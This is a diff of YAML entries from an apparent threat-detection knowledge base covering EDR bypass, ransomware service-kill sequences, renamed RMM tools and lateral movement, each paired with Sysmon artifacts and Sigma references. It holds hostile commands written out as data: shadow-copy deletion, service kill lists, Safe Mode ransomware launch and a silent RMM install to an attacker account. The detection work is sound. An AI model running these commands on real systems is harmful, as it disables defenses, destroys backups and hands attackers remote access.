Notes: 'Directly removes registered kernel callbacks (PsSetCreateProcessNotifyRoutine, PsSetLoadImageNotifyRoutine) from
the kernel callback array, blinding EDRs at the kernel level without killing their processes. Uses hardcoded kernel
offsets to avoid BSOD. Absence of expected callbacks is detectable via memory analysis.'
@@ -134,7 +134,7 @@ Variations:
- 'Sysmon EID 6: Vulnerable driver loaded (used for kernel R/W)'
- 'Sysmon EID 1: EDRSandblast execution with --kernelmode or --all flags'
- 'Memory analysis: Absence of expected kernel callbacks (PsNotifyRoutine array zeroed)'
- 'No process termination events — EDR processes stay alive but blinded'
- 'No process termination events. EDR processes stay alive but blinded.'
ChokepointMapping: 'admin → vulnerable driver loaded for kernel R/W → kernel callback arrays patched → EDR blinded (no process/image notifications)'
- Name: PPL Abuse (PPLKiller / PPLdump)
FirstSeen: 2020-Q4
@@ -166,7 +166,7 @@ Variations:
Eliminates all user-mode EDR visibility without touching the kernel.'
VariantId: user-mode-unhooking-ntdll-fresh-copy
Command:
Invocation: "# Embedded in malware — no standalone CLI:\nntdll_base = LoadLibraryEx(\"C:\\\\Windows\\\\System32\\\\ntdll.dll\",
Invocation: "# Embedded in malware. No standalone CLI.\nntdll_base = LoadLibraryEx(\"C:\\\\Windows\\\\System32\\\\ntdll.dll\",
LOAD_LIBRARY_AS_DATAFILE)\n# Overwrite .text section of hooked ntdll with clean copy"
Context: 'Technique is embedded in malware code, not a standalone tool. Kernel-level ETW Threat-Intelligence providers
still fire on sensitive operations.'
@@ -191,7 +191,7 @@ Variations:
Artifacts:
- 'ETW: Microsoft-Windows-Kernel-Process shows unusual syscall patterns'
- 'Call stack analysis: syscall return address not within ntdll.dll memory range'
- 'No single CLI command — technique is embedded in malware code'
- 'No single CLI command. Technique is embedded in malware code.'
ChokepointMapping: 'malware execution → direct syscall instructions bypass ntdll hooks → EDR userland visibility bypassed'
- Name: ETW Patching (EtwEventWrite)
FirstSeen: 2020-Q2
@@ -234,13 +234,13 @@ Variations:
SourceURL: https://github.com/netero1010/EDRSilencer
NotesShort: Blocks EDR network comms via WFP filters; EDR runs but cannot report
Notes: 'Blocks EDR network communication using Windows Filtering Platform (WFP) callout drivers to prevent telemetry and
alerts from reaching the management console. Does not kill EDR processes — instead creates a silent EDR that cannot
alerts from reaching the management console. Does not kill EDR processes. Instead creates a silent EDR that cannot
report. Requires admin privileges.'
VariantId: edrsilencer
Command:
Invocation: "EDRSilencer.exe blockedr\n# Enumerates running EDR processes\n# Creates WFP filters blocking their
outbound network traffic\n# EDR continues running but telemetry never reaches console"
Context: 'Alternative to process termination — EDR stays alive but isolated from its management plane.'
Context: 'Alternative to process termination. EDR stays alive but isolated from its management plane.'
Artifacts:
- 'Security EID 5441: WFP filter installation'
- 'Sysmon EID 1: EDRSilencer process execution'
@@ -257,7 +257,7 @@ Variations:
memory detections. Still used in Cobalt Strike and Havoc.'
VariantId: module-stomping-reflective-dll-injection
Command:
Invocation: "# Embedded in C2 frameworks — no standalone CLI:\n# 1. Load legitimate DLL (e.g., amsi.dll)\n# 2. Overwrite
Invocation: "# Embedded in C2 frameworks. No standalone CLI.\n# 1. Load legitimate DLL (e.g., amsi.dll)\n# 2. Overwrite
.text section with shellcode\n# 3. Execute from legitimate DLL's address space"
Context: 'Technique is built into C2 frameworks (Cobalt Strike, Havoc). Leaves no disk artifact for the injected code.'
Artifacts:
@@ -276,7 +276,7 @@ Variations:
Command:
Invocation: "bcdedit /set {default} safeboot minimal\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"
/v \"payload\" /t REG_SZ /d \"C:\\temp\\ransomware.exe\" /f\nshutdown /r /f /t 0"
Context: 'Sets next boot to Safe Mode (minimal — no networking). Registers ransomware as RunOnce entry. Forces
Context: 'Sets next boot to Safe Mode (minimal, no networking). Registers ransomware as RunOnce entry. Forces
immediate reboot. EDR services are not configured for Safe Mode boot.'
Artifacts:
- 'Sysmon EID 1: bcdedit.exe with /set and safeboot arguments'
@@ -298,22 +298,10 @@ Prerequisites:
- For kernel callback removal: ability to read/write kernel memory (via vulnerable driver)
- For user-mode techniques: VirtualProtect/NtProtectVirtualMemory access to target DLL memory
- Target EDR must be using one of the impaired mechanisms (user-mode hooks, ETW, kernel callbacks)
AttackerControls:
- Choice of bypass method (BYOVD, callback removal, PPL abuse, unhooking)
- Specific vulnerable driver or tool used
- Evasion technique for the driver/tool itself
- Timing relative to payload execution
- Persistence mechanism for the bypass
AttackerCannotControl:
- Must obtain admin/SYSTEM privileges before any bypass
- Must load a kernel driver or modify kernel memory
- Security process/service must be stopped, killed, or blinded
- Driver load event is logged by Sysmon EID 6
- Process termination or service state change is logged
Chokepoints:
- Stage: Privilege Escalation
Input: Attacker has code execution on the target but lacks admin rights
Invariant: Must obtain admin or SYSTEM privileges — no BYOVD, callback removal, or PPL abuse works without elevation
Invariant: Must obtain admin or SYSTEM privileges. No BYOVD, callback removal, or PPL abuse works without elevation.
Observable: 'Sysmon EID 1 showing privilege escalation (token manipulation, UAC bypass, service exploitation) or process
running with high integrity level'
WhyCantBypass: Kernel drivers require admin to load. Process termination of protected processes requires SYSTEM. No EDR
@@ -326,9 +314,9 @@ Chokepoints:
SigmaRef: sigma-rules/edr-bypass/hunt.yml
- Stage: EDR Telemetry Disruption
Input: Attacker has admin/SYSTEM privileges
Invariant: Must disrupt EDR telemetry collection through one of these mechanisms — load a kernel driver (BYOVD), modify
kernel memory (callback removal), patch userland hooks (ntdll unhooking, direct syscalls), patch ETW/AMSI functions,
block EDR network traffic (WFP filters), or boot into Safe Mode where EDR services don't load
Invariant: Must disrupt EDR telemetry collection. Options include loading a kernel driver (BYOVD), modifying
kernel memory (callback removal), patching userland hooks (ntdll unhooking, direct syscalls), patching ETW/AMSI functions,
blocking EDR network traffic (WFP filters), or booting into Safe Mode where EDR services don't load.
Observable: 'Kernel path: Sysmon EID 6 (Driver Loaded) for BYOVD variants. Userland path: Sysmon EID 7 (second ntdll.dll
loaded) or ETW-TI VirtualProtect on EtwEventWrite/AmsiScanBuffer. Network path: Security EID 5441 (WFP filter installed).
Safe Mode: Sysmon EID 1 showing bcdedit with safeboot argument.'
@@ -424,7 +412,7 @@ EvolutionTimeline:
DetectionImpact: Existing BYOVD and kernel callback removal detections may catch underlying technique, but new tool signatures
and delivery via HR-themed lures require updated behavioral and email/endpoint rules.
TheConstant: Still requires admin/SYSTEM privileges on the target system to disable EDR, and must impair kernel callbacks,
user-mode hooks, or ETW — the core invariant prerequisites remain unchanged.
user-mode hooks, or ETW. The core invariant prerequisites remain unchanged.
Variants: []
EventType: event
Detections:
@@ -459,8 +447,8 @@ Detections:
UseCase: Proactive hunt for BYOVD-based EDR killing; correlates driver load with subsequent security tool impairment
SigmaRule: sigma-rules/edr-bypass/hunt.yml
- Level: Analyst
Description: Known vulnerable or recently signed driver load immediately followed by security process termination — direct
EDR kill signal
Description: Known vulnerable or recently signed driver load immediately followed by security process termination. Direct
EDR kill signal.
LogSources:
- Sysmon Event ID 6 (Driver Loaded)
- Sysmon Event ID 1 (Process Creation)
@@ -492,7 +480,7 @@ Intel:
Tier: primary
URL: https://attack.mitre.org/techniques/T1562/006/
Description: Technique definition covering ETW patching, AMSI bypass, and other telemetry-blocking methods; distinct from
process termination — attacker keeps EDR running but blinds it
process termination; attacker keeps EDR running but blinds it
- Name: Microsoft — Vulnerable Driver Blocklist
Tier: primary
URL: https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
@@ -504,12 +492,12 @@ OsintSources:
- Platform: VirusTotal Intelligence
Query: tag:byovd positives:0
URL: https://www.virustotal.com/gui/search/tag%3Abyovd%20positives%3A0
Notes: Requires VT Intelligence subscription. Finds BYOVD samples with zero AV detections — the most dangerous current variants.
Notes: Requires VT Intelligence subscription. Finds BYOVD samples with zero AV detections; these are the most dangerous current variants.
Pivot to the behavior tab to extract the specific driver filename, hash, and kernel callback manipulation sequence.
- Platform: GitHub Code Search
Query: '"PsSetCreateProcessNotifyRoutine" OR "ObRegisterCallbacks" path:*.c OR path:*.cpp'
URL: https://github.com/search?q=%22PsSetCreateProcessNotifyRoutine%22+OR+%22ObRegisterCallbacks%22&type=code
Notes: Finds kernel driver source code interacting with process notification callbacks — the primary mechanism BYOVD tools
Notes: Finds kernel driver source code interacting with process notification callbacks, the primary mechanism BYOVD tools
manipulate. Monitor for new public tools targeting these APIs.
- Platform: GitHub Code Search
Query: '"EtwEventWrite" "0xC3" path:*.c OR path:*.asm'
@@ -554,7 +542,7 @@ KnownBypasses:
Mitigation: EDR solutions must implement kernel callbacks rather than relying solely on user-mode hooks; enforce application
control to block unknown binaries
Detection: 'Kernel-level process and thread creation callbacks still fire regardless of syscall technique. Detect by correlating
process creation callbacks with the absence of expected user-mode telemetry — a process that creates threads but generates
process creation callbacks with the absence of expected user-mode telemetry. A process that creates threads but generates
no user-mode hook events is anomalous.
'
@@ -568,7 +556,7 @@ RawLogs:
- Type: Sysmon
EventId: 6
Source: Microsoft-Windows-Sysmon/Operational
Description: Vulnerable/recently-signed kernel driver loaded — BYOVD technique initiation
Description: Vulnerable/recently-signed kernel driver loaded. BYOVD technique initiation.
MatchedRules:
- Research
Sample: 'EventID: 6 (Driver Loaded)
@@ -585,7 +573,7 @@ RawLogs:
SignatureStatus: Valid
# Driver signed by "Raynet Inc." — a certificate issued 6 days prior to this event
# Driver signed by "Raynet Inc.", a certificate issued 6 days prior to this event
# Hash matches Microsoft Vulnerable Driver Blocklist (truesight.sys / RogueKiller driver)
@@ -595,7 +583,7 @@ RawLogs:
- Type: Sysmon
EventId: 10
Source: Microsoft-Windows-Sysmon/Operational
Description: BYOVD process opens handle to EDR process — pre-kill access request
Description: BYOVD process opens handle to EDR process. Pre-kill access request.
MatchedRules:
- Hunt
- Analyst
@@ -619,7 +607,7 @@ RawLogs:
# PROCESS_ALL_ACCESS from non-trusted process to security process
# Follows driver load within 5 minutes — Hunt rule correlation
# Follows driver load within 5 minutes. Hunt rule correlation.
'
- Type: Windows Event Log
@@ -48,7 +48,7 @@ Variations:
NotesShort: FBI-disrupted December 2023; resumed operations, attacked Change Healthcare February 2024; exit-scammed affiliates
March 2024 after $22M ransom
Notes: Targets Sophos, Defender, VSS, SQL; cross-platform (Windows and Linux/ESXi); FBI disruption December 2023; exited
via scam March 2024 after $22M Change Healthcare ransom — leadership withheld affiliate commissions and shut down infrastructure
via scam March 2024 after $22M Change Healthcare ransom. Leadership withheld affiliate commissions and shut down infrastructure
VariantId: alphv-blackcat
Command:
Invocation: "# Windows Rust binary with embedded service list:\nnet stop \"Sophos Agent\" /y\nnet stop \"vss\" /y\nnet stop \"MSSQL$SQLEXPRESS\" /y\nwmic service where \"name like '%backup%'\" call stopservice"
@@ -97,7 +97,7 @@ Variations:
SourceURL: https://www.trendmicro.com/en_us/research/24/d/operation-cronos-aftermath.html
NotesShort: Operation Cronos seized 28 servers and 1,000+ decryption keys; significantly disrupted
Notes: Comprehensive kill list (50+ services); Group Policy abuse for domain-wide deployment; Operation Cronos (February
2024) seized 28 servers, source code, and 1000+ decryption keys — significantly reduced operational capacity
2024) seized 28 servers, source code, and 1000+ decryption keys. Significantly reduced operational capacity
VariantId: lockbit-3-0
Command:
Invocation: "# Domain-wide via Group Policy scheduled task:\nschtasks /create /tn \"Windows Update\" /tr \"C:\\windows\\temp\\lockbit.exe\" /sc once /st 00:00 /ru SYSTEM\n# Kill list (50+ services):\nsc stop SophosFileScanner\nsc stop CrowdStrike\nsc stop SentinelAgent\nsc stop veeam\nsc stop MSSQLSERVER\nsc stop wbengine\nsc stop VSS\n# ... 40+ more services\nvssadmin delete shadows /all /quiet\nbcdedit /set {default} recoveryenabled No"
@@ -113,26 +113,14 @@ Variations:
Prerequisites:
- Admin or SYSTEM privileges already established on target system
- Target security, backup, and database services are running (cannot stop what is not running)
AttackerControls:
- Specific services targeted (VSS, SQL, backup agents)
- Method of stopping services (sc.exe, net.exe, WMI, PowerShell)
- Order and timing of service stops
- Encryption algorithm and ransom note content
- Lateral movement method used to reach the target
AttackerCannotControl:
- Must run with SYSTEM privileges
- Must enumerate running services to find targets
- Must stop services before encryption begins
- Service state change events are logged by the OS
- Bulk service stops in short time window are anomalous
Chokepoints:
- Stage: Service Enumeration
Input: Attacker has SYSTEM privileges on the target system
Invariant: Actor enumerates running services to build the kill list via sc query, Get-Service, wmic, or equivalent
Observable: 'Sysmon EID 1 showing sc.exe query, wmic service get, or Get-Service commands. Multiple service
enumeration commands in rapid succession from the same process or user context.'
WhyCantBypass: Ransomware cannot stop what it cannot find — service enumeration precedes every observed kill sequence across
all documented families; sc.exe stop and delete require Admin or SYSTEM privileges, so no privilege escalation means immediate
WhyCantBypass: Ransomware cannot stop what it cannot find. Service enumeration precedes every observed kill sequence across
all documented families. sc.exe stop and delete require Admin or SYSTEM privileges, so no privilege escalation means immediate
failure before enumeration can complete
LogSources:
- Sysmon Event ID 1 (sc.exe query / wmic service get / Get-Service)
@@ -142,10 +130,10 @@ Chokepoints:
- Stage: Bulk Service Stop
Input: Service kill list has been built via enumeration
Invariant: Security, backup, and database services are stopped in rapid succession via sc.exe, net stop, taskkill, or WMI
StopService — multiple services within a short window
StopService. Multiple services within a short window
Observable: 'Windows System EID 7036 showing multiple security/backup services transitioning to "stopped" state
within 60 seconds. Sysmon EID 1 showing repeated sc stop or net stop commands.'
WhyCantBypass: Files locked by running services cannot be encrypted — stop must precede encryption in every observed ransomware
WhyCantBypass: Files locked by running services cannot be encrypted. Stop must precede encryption in every observed ransomware
family without exception
LogSources:
- Windows System Event ID 7036 (Service State Change — stopped)
@@ -154,14 +142,14 @@ Chokepoints:
DetectionTier: Hunt
SigmaRef: sigma-rules/ransomware-service/hunt.yml
BypassNote: Purpose-built EDR killers (BYOVD drivers, EDRKillShifter) bypass service-stop detection by killing the EDR process
at kernel level — monitor Sysmon EID 6 for suspicious driver loads immediately before bulk service termination
at kernel level. Monitor Sysmon EID 6 for suspicious driver loads immediately before bulk service termination
- Stage: Service Deletion
Input: Target services have been stopped
Invariant: Stopped services are deleted or permanently disabled to prevent automatic restart during the encryption phase
Observable: 'Sysmon EID 1 showing sc.exe delete or sc.exe config start= disabled commands targeting security
and backup services. Registry changes under HKLM\SYSTEM\CurrentControlSet\Services\ confirming service deletion.'
WhyCantBypass: Without deletion, Windows service recovery policies restart stopped services and interfere with encryption
— deletion is confirmed across all major documented families
WhyCantBypass: Without deletion, Windows service recovery policies restart stopped services and interfere with encryption.
Deletion is confirmed across all major documented families
LogSources:
- Sysmon Event ID 1 (sc.exe delete / sc.exe config start= disabled)
- Sysmon Event ID 12/13 (Registry key deletion under Services hive)
@@ -14,7 +14,7 @@ Description: 'Legitimate remote management and monitoring (RMM) tools are rename
(tax documents, invoices, IT support tools) and delivered via browser download. Once executed, the RMM establishes persistent
command-and-control to attacker infrastructure while appearing to be a signed, legitimate binary. Because the binary is
legitimately signed by the vendor, many security tools will not flag it. The chokepoint is the browser download, file masquerading,
user execution, and outbound connection to RMM infrastructure — all of which are required regardless of which RMM tool is
user execution, and outbound connection to RMM infrastructure. All of which are required regardless of which RMM tool is
used.
'
@@ -27,7 +27,7 @@ Variations:
SourceURL: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a
NotesShort: Declining; February 2024 production breach revoked signing cert, driving actor migration
Notes: 'Common masquerade names: invoice.exe, tax_form.exe, SSN_verification.exe; February 2024 production server breach
resulted in source code and code signing certificate theft — certificate revoked, driving threat actor migration to other
resulted in source code and code signing certificate theft. Certificate revoked, driving threat actor migration to other
tools'
VariantId: anydesk
Command:
@@ -61,7 +61,7 @@ Variations:
NotesShort: Primary renamed-binary choice; CVE-2024-1709 also enables direct server exploitation
Notes: 'Common masquerade names: support_tool.exe, IT_access.exe; now primary choice for renamed-binary delivery; February
2024 CVE-2024-1709 (auth bypass) + CVE-2024-1708 (path traversal) enabled direct server exploitation by LockBit, Black
Basta, and Bl00dy — 18,188 exposed instances globally at time of disclosure; dual vector: user-delivered binary AND direct
Basta, and Bl00dy. 18,188 exposed instances globally at time of disclosure; dual vector: user-delivered binary AND direct
server exploitation'
VariantId: screenconnect-connectwise
Command:
@@ -149,7 +149,7 @@ Variations:
VariantId: atera
Command:
Invocation: "msiexec /i AteraSetup.msi /qn INTEGRATORLOGIN=attacker@email.com ACCOUNTID=<attacker_account>\n# Silent install, agent registers to attacker's Atera account"
Context: 'Cloud-based RMM. MSI registers agent to attacker Atera account. Uses legitimate Atera cloud — domain blocking difficult.'
Context: 'Cloud-based RMM. MSI registers agent to attacker Atera account. Uses legitimate Atera cloud; domain blocking difficult.'
Artifacts:
- 'Sysmon EID 1: msiexec.exe with /qn flag installing Atera MSI'
- 'Sysmon EID 11: AteraAgent.exe installed'
@@ -160,7 +160,7 @@ Variations:
Status: Active
SourceURL: https://www.microsoft.com/en-us/security/blog/2026/03/03/signed-malware-impersonating-workplace-apps-deploys-rmm-backdoors/
NotesShort: First RMM deploys a second for redundancy; removes single point of C2 failure
Notes: 'One RMM (e.g., ScreenConnect) deploys a second RMM (e.g., AnyDesk) for redundancy — if one is removed, the other
Notes: 'One RMM (e.g., ScreenConnect) deploys a second RMM (e.g., AnyDesk) for redundancy. If one is removed, the other
maintains access
'
@@ -189,7 +189,7 @@ MasqueradeThemes:
- tax-document-2024.exe (inferred pattern)
LureDetails: 'IRS impersonation emails ("Refund Eligibility Notification", "EFIN Verification Required") direct victims
to attacker-controlled sites. Domains follow patterns like doc-irs[.]us. Microsoft documented a February 2025 wave delivering
SimpleHelp via IRS EFIN lure. Highly seasonal — spikes January–April around US tax filing deadlines. Extend detection
SimpleHelp via IRS EFIN lure. Highly seasonal. Spikes January–April around US tax filing deadlines. Extend detection
with W-2, refund, enrollment pretexts during relevant periods.
'
@@ -212,8 +212,8 @@ MasqueradeThemes:
- Trojanized ScreenConnect installer (Cloudflare research)
LureDetails: 'Emails with subjects like "Your SSN is going to be suspended (Case ID - SSA-526487442)" direct victims to
fake SSA portals. Cloudflare Force One documented a specific campaign delivering a trojanized ScreenConnect installer
via this pretext. Threat is escalating as public awareness of SSA disruptions increases in 2025 — lure credibility is
currently high. ScreenConnect delivery via this theme was confirmed by Cloudflare; other RMM tools inferred from campaign
via this pretext. Threat is escalating as public awareness of SSA disruptions increases in 2025; lure credibility is
currently high. ScreenConnect delivery via this theme was confirmed by Cloudflare. Other RMM tools inferred from campaign
infrastructure overlap.
'
@@ -261,12 +261,12 @@ MasqueradeThemes:
- ScreenConnect
DocumentedFilenames:
- Quick Assist (legitimate name)
- AnyDesk installer (legitimate name — not renamed in this vector)
- AnyDesk installer (legitimate name, not renamed in this vector)
LureDetails: 'Actor impersonates internal IT helpdesk via Microsoft Teams messages or email flood + phone call. Black Basta
(Storm-1811) documented by Rapid7 (May 2024) and ReliaQuest: actor sends thousands of spam emails to overwhelm victim
inbox, then calls or Teams-messages offering "help," directing the victim to install Quick Assist or AnyDesk. A Teams
+ QR code variant escalated in December 2024 (Arctic Wolf). Note: this vector typically uses legitimately-named installers
rather than renamed binaries — the social engineering replaces the masquerade. Detection must cover both renamed-binary
rather than renamed binaries. The social engineering replaces the masquerade. Detection must cover both renamed-binary
and IT-directed-installation patterns.
'
@@ -296,10 +296,10 @@ MasqueradeThemes:
- E-Invite MSI
LureDetails: 'Fake meeting invites or calendar links direct victims to attacker-controlled download pages serving RMM installers
with legitimate-looking names. Microsoft Defender Experts (March 2026) documented signed malware (EV certificate: "TrustConnect
Software PTY LTD") impersonating Teams, Zoom, Adobe, and Google Meet — delivering ScreenConnect, Tactical RMM, and MeshAgent.
Software PTY LTD") impersonating Teams, Zoom, Adobe, and Google Meet, delivering ScreenConnect, Tactical RMM, and MeshAgent.
Red Canary documented "Party Card Viewer" and "E-Invite" MSI files delivering Atera. Check Point (December 2024) documented
Google Calendar-delivered phishing targeting 300+ organizations (4,000+ emails). The EV code signing certificate is a
critical evasion element — signed MSI files pass many endpoint controls.
critical evasion element. Signed MSI files pass many endpoint controls.
'
Sources:
@@ -349,7 +349,7 @@ MasqueradeThemes:
- DocuSign/e-signature spoofs (more commonly credential harvesters, not RMM)
LureDetails: 'HR impersonation emails (salary review, benefits enrollment, onboarding portal) deliver RMM tools. Mimecast
specifically documented a campaign shift from credential harvesting to RMM tool deployment via HR-themed lures. This pretext
is less common than IT support or invoice lures for RMM delivery — HR themes more frequently deliver credential harvesters
is less common than IT support or invoice lures for RMM delivery. HR themes more frequently deliver credential harvesters
or document-based malware. When RMM delivery does occur, it typically involves DocuSign spoofs or "sign your employment
documents" pretexts directing victims to a download.
@@ -382,19 +382,7 @@ MasqueradeThemes:
- Red Canary — fake update pages with security framing
Prerequisites:
- User account can execute binaries from browser download paths (Downloads, Temp, AppData)
- RMM binary carries a valid vendor code-signing certificate — hash-based detection does not fire
AttackerControls:
- Choice of RMM tool (AnyDesk, ScreenConnect, TeamViewer, RustDesk)
- Social engineering pretext (tax form, IT helpdesk, invoice)
- Filename used to masquerade the RMM binary
- Delivery infrastructure (compromised site, malvertising, email)
- C2 relay configuration (vendor cloud vs. self-hosted)
AttackerCannotControl:
- RMM binary must be downloaded to disk via browser
- Binary must execute as a process — PE metadata reveals true identity
- Outbound connection to RMM relay is required for remote access
- File creation event is logged (Sysmon EID 11)
- Process creation event is logged with OriginalFilename mismatch
- RMM binary carries a valid vendor code-signing certificate; hash-based detection does not fire
Chokepoints:
- Stage: Browser Download
Input: User clicks a link or is directed to download a file from an attacker-controlled or compromised site
@@ -402,7 +390,7 @@ Chokepoints:
or generic filename masking RMM software
Observable: 'Sysmon EID 11 showing browser process (chrome.exe, msedge.exe) writing an executable to Downloads/Temp.
File hash matches a known RMM tool despite the campaign-themed filename.'
WhyCantBypass: The binary must land on disk before execution — no in-memory-only path exists for the initial delivery of
WhyCantBypass: The binary must land on disk before execution. No in-memory-only path exists for the initial delivery of
a standalone RMM installer; the file must be hosted on an attacker-controlled or compromised site reachable by the victim's
browser, so delivery cannot be skipped in any variant including TOAD phone-assisted delivery
LogSources:
@@ -412,37 +400,37 @@ Chokepoints:
SigmaRef: sigma-rules/renamed-rmm/hunt.yml
- Stage: User Execution
Input: RMM binary exists on disk with a masqueraded filename
Invariant: User executes the downloaded binary, which is a legitimately-signed RMM tool regardless of its filename — PE
Invariant: User executes the downloaded binary, which is a legitimately-signed RMM tool regardless of its filename. PE
metadata (OriginalFilename, Company) betrays the mismatch
Observable: 'Sysmon EID 1 showing process creation where Image filename differs from PE OriginalFilename metadata.
For example: Image=tax_form.exe but OriginalFilename=AnyDesk.exe or Company=philandro Software GmbH.'
WhyCantBypass: The binary must execute to establish C2 — no execution means no remote access regardless of delivery success
WhyCantBypass: The binary must execute to establish C2. No execution means no remote access regardless of delivery success
LogSources:
- Sysmon Event ID 1 (Process Creation)
- Windows Security Event ID 4688 (Process Creation)
DetectionTier: Analyst
SigmaRef: sigma-rules/renamed-rmm/analyst.yml
BypassNote: CVE exploitation of internet-exposed RMM servers (ScreenConnect CVE-2024-1709, SimpleHelp CVE-2024-57727) bypasses
all user-execution detection — monitor RMM server process telemetry separately
all user-execution detection. Monitor RMM server process telemetry separately
- Stage: Outbound RMM Connection
Input: RMM process is running on the endpoint
Invariant: Executed binary establishes a persistent connection to RMM relay or attacker-controlled server on standard HTTPS
ports
Observable: 'Sysmon EID 3 showing outbound HTTPS connection from a process whose Image path is in a user-writable
directory to known RMM relay domains or self-hosted infrastructure.'
WhyCantBypass: The C2 channel must be established — the entire purpose of RMM tool deployment is persistent remote access
WhyCantBypass: The C2 channel must be established. The entire purpose of RMM tool deployment is persistent remote access
LogSources:
- Sysmon Event ID 3 (Network Connection)
- Firewall / proxy egress logs
DetectionTier: Analyst
SigmaRef: sigma-rules/renamed-rmm/analyst.yml
BypassNote: Self-hosted RMM infrastructure (RustDesk, MeshCentral) makes domain-based blocking ineffective — detect by behavior
BypassNote: Self-hosted RMM infrastructure (RustDesk, MeshCentral) makes domain-based blocking ineffective. Detect by behavior
(browser download + execution + outbound), not by destination
EvolutionTimeline:
- Date: '2019'
Event: TeamViewer and AnyDesk adoption in social engineering campaigns
Change: Legitimate RMM binaries adopted as initial access alternative to malware; signed binaries evade hash-based detection.
DetectionImpact: New pattern — signed binaries evading hash-based detection
DetectionImpact: New pattern. Signed binaries evading hash-based detection
Variants: []
EventType: event
- Date: 2022-Q3
@@ -558,7 +546,7 @@ OsintSources:
- Platform: URLScan
Query: 'filename:MicrosoftTeams.msi OR filename:chrome_update.exe OR filename:security_scan.exe OR filename:verify.exe OR filename:support.exe'
URL: https://urlscan.io/search/#filename%3AMicrosoftTeams.msi%20OR%20filename%3Achrome_update.exe%20OR%20filename%3Asecurity_scan.exe%20OR%20filename%3Averify.exe%20OR%20filename%3Asupport.exe
Notes: 'Targets documented masquerade filenames used in renamed RMM campaigns — fake Teams installers
Notes: 'Targets documented masquerade filenames used in renamed RMM campaigns, including fake Teams installers
(March 2026 signed malware campaign), fake Chrome updates (SocGholish/FakeUpdates), and security/support
themed binaries (UltraViewer campaigns). Rotate with seasonal themes: tax-document, invoice, SSN,
E-Invite, Party Card Viewer during relevant periods.'
@@ -570,13 +558,13 @@ OsintSources:
- Platform: Censys
Query: 'services.tls.certificate.parsed.subject.common_name: "SimpleHelp"'
URL: https://search.censys.io/search?resource=hosts&q=services.tls.certificate.parsed.subject.common_name%3A+%22SimpleHelp%22
Notes: Finds infrastructure presenting SimpleHelp TLS certificates — currently the most actively exploited RMM platform
Notes: Finds infrastructure presenting SimpleHelp TLS certificates; currently the most actively exploited RMM platform
per CISA AA25-163A.
- Platform: VirusTotal Intelligence
Query: have:itw tag:peexe (metadata:"AnyDesk" OR metadata:"ScreenConnect" OR metadata:"SimpleHelp" OR metadata:"NetSupport")
URL: https://www.virustotal.com/gui/search/have%3Aitw%20tag%3Apeexe%20metadata%3A%22AnyDesk%22
Notes: Requires VT Intelligence subscription; finds PE executables in the wild whose internal metadata references known
RMM vendors — the core renamed-binary delivery mechanism.
RMM vendors; the core renamed-binary delivery mechanism.
- Platform: LOLRMM
URL: https://lolrmm.io
Notes: Community-maintained catalog of every known RMM tool with file metadata, network indicators, and detection heuristics
@@ -615,13 +603,13 @@ RawLogs:
CreationUtcTime: 2024-10-15 09:34:12.881
# Browser drops .exe directly to Downloads — combined with execution signals Hunt/Analyst rules
# Browser drops .exe directly to Downloads. Combined with execution signals Hunt/Analyst rules
'
- Type: Sysmon
EventId: 1
Source: Microsoft-Windows-Sysmon/Operational
Description: Renamed RMM binary executed — OriginalFilename mismatch is the Analyst signal
Description: Renamed RMM binary executed. OriginalFilename mismatch is the Analyst signal
MatchedRules:
- Research
- Hunt
@@ -54,9 +54,9 @@ Variations:
FirstSeen: '2016'
Status: Legacy
SourceURL: https://github.com/byt3bl33d3r/CrackMapExec
NotesShort: Archived December 2023; superseded by NetExec — CME-specific signatures now stale
NotesShort: Archived December 2023; superseded by NetExec. CME-specific signatures now stale
Notes: Multi-protocol framework covering SMB, WMI, WinRM, MSSQL; original repository archived by maintainer on December
6, 2023 (read-only); superseded by NetExec — defenders should not expect CME-specific signatures to receive community
6, 2023 (read-only); superseded by NetExec. Defenders should not expect CME-specific signatures to receive community
updates
VariantId: crackmapexec
Command:
@@ -156,25 +156,13 @@ Variations:
Prerequisites:
- Network access to target on at least one required protocol port (SMB 445, WMI/RPC 135, WinRM 5985/5986)
- Remote execution surface enabled on target (Server service for SMB, WinRM service, WMI, or Task Scheduler)
AttackerControls:
- Tool used (Impacket, NetExec, CrackMapExec, Evil-WinRM)
- Protocol choice (SMB, WMI, WinRM, DCOM)
- Execution method (psexec, smbexec, wmiexec, atexec)
- Lateral movement scope and targeting
- Credential source (dumped, sprayed, pass-the-hash)
AttackerCannotControl:
- Must have valid admin credentials for the target
- Must authenticate over the network to the target
- Must create a remote process or service on the target
- Authentication event is logged on the target (4624 Type 3)
- Process/service creation is logged on the target
Chokepoints:
- Stage: Network Authentication
Input: Attacker has valid admin credentials (password, hash, or ticket)
Invariant: Valid admin credentials (local or domain) must be obtained before any remote execution attempt
Observable: 'Windows Security EID 4624 (Logon Type 3 — Network) with admin account. EID 4672 (Special Privilege
Observable: 'Windows Security EID 4624 (Logon Type 3, Network) with admin account. EID 4672 (Special Privilege
Logon). Source IP is typically not a known admin workstation.'
WhyCantBypass: All remote execution tools require authenticated access — no valid credentials means authentication failure
WhyCantBypass: All remote execution tools require authenticated access. No valid credentials means authentication failure
at every attempted protocol regardless of which tool is used
LogSources:
- Windows Security Event ID 4624 (Network Logon)
@@ -185,13 +173,13 @@ Chokepoints:
SigmaRef: ''
- Stage: Remote Process/Service Creation
Input: Authenticated admin session established on target
Invariant: Tool invokes a Windows execution primitive on the remote host — service creation (SMB), WMI process spawn, scheduled
Invariant: Tool invokes a Windows execution primitive on the remote host: service creation (SMB), WMI process spawn, scheduled
task creation, or WinRM command
Observable: 'Sysmon EID 1 showing services.exe or wmiprvse.exe spawning cmd.exe/powershell.exe. Windows Security
EID 7045 (Service Installed) for psexec-style tools. EID 4688 with cross-logon session correlation.'
WhyCantBypass: A command must run on the target via one of these four primitives — no other execution surface exists over
these authenticated protocols; tools must first establish an authenticated session over a protocol port (445, 135, 5985/5986)
— no reachable port means no remote execution regardless of credential validity
WhyCantBypass: A command must run on the target via one of these four primitives. No other execution surface exists over
these authenticated protocols. Tools must first establish an authenticated session over a protocol port (445, 135, 5985/5986).
No reachable port means no remote execution regardless of credential validity
LogSources:
- Windows Security Event ID 4697 / System 7045 (Service Installed)
- Windows Security Event ID 5145 (IPC$/svcctl share access)
@@ -199,7 +187,7 @@ Chokepoints:
DetectionTier: Analyst
